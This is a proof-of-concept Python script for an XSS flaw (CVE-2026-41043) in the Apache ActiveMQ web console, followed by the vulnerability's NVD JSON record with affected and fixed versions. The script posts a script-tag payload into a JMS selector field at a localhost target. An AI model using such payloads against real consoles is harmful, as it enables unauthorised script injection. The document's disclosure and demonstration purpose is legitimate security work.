CVE-2026-41043

import requests # Target URL (Example) target_url = "http://localhost:8161/admin/queues.jsp" # Malicious Payload to be injected into the JMS selector field xss_payload = "<script>alert('CVE-2026-41043 XSS');</script>" # Headers to override the content type headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "text/html", # Overriding content type to trigger HTML rendering "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" } # Data payload targeting the JMS selector parameter # Note: The actual parameter name might vary depending on the specific endpoint implementation data = { "JMSSelector": xss_payload, "view": "queues" } # Sending the request try: response = requests.post(target_url, headers=headers, data=data, verify=False) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check the browser console or queue page for the alert.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-41043", "sourceIdentifier": "[email protected]", "published": "2026-04-24T11:16:22.670", "lastModified": "2026-04-27T14:49:24.927", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache ActiveMQ, Apache ActiveMQ Web.\n\nAn authenticated attacker can show malicious content when browsing queues in the web console by overriding the content type to be HTML (instead of XML) and by injecting HTML into a JMS selector field.\n\nThis issue affects Apache ActiveMQ: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ Web: before 5.19.6, from 6.0.0 before 6.2.5.\n\nUsers are recommended to upgrade to version 6.2.5 or 5.19.6, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-915"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.19.6", "matchCriteriaId": "550C287A-18F0-462A-BFC9-2AD8A64B951A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.2.5", "matchCriteriaId": "F7BDD719-DDF9-42A2-AD9D-05FB6D758EF1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq_web:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.19.6", "matchCriteriaId": "6D85C151-239D-408F-833F-9DEB4341EC19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq_web:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.2.5", "matchCriteriaId": "D0D5129B-51AC-4A0D-B4A4-17D84A9D89CE"}]}]}], "references": [{"url": "https://activemq.apache.org/security-advisories.data/CVE-2026-41043-announcement.txt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/23/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}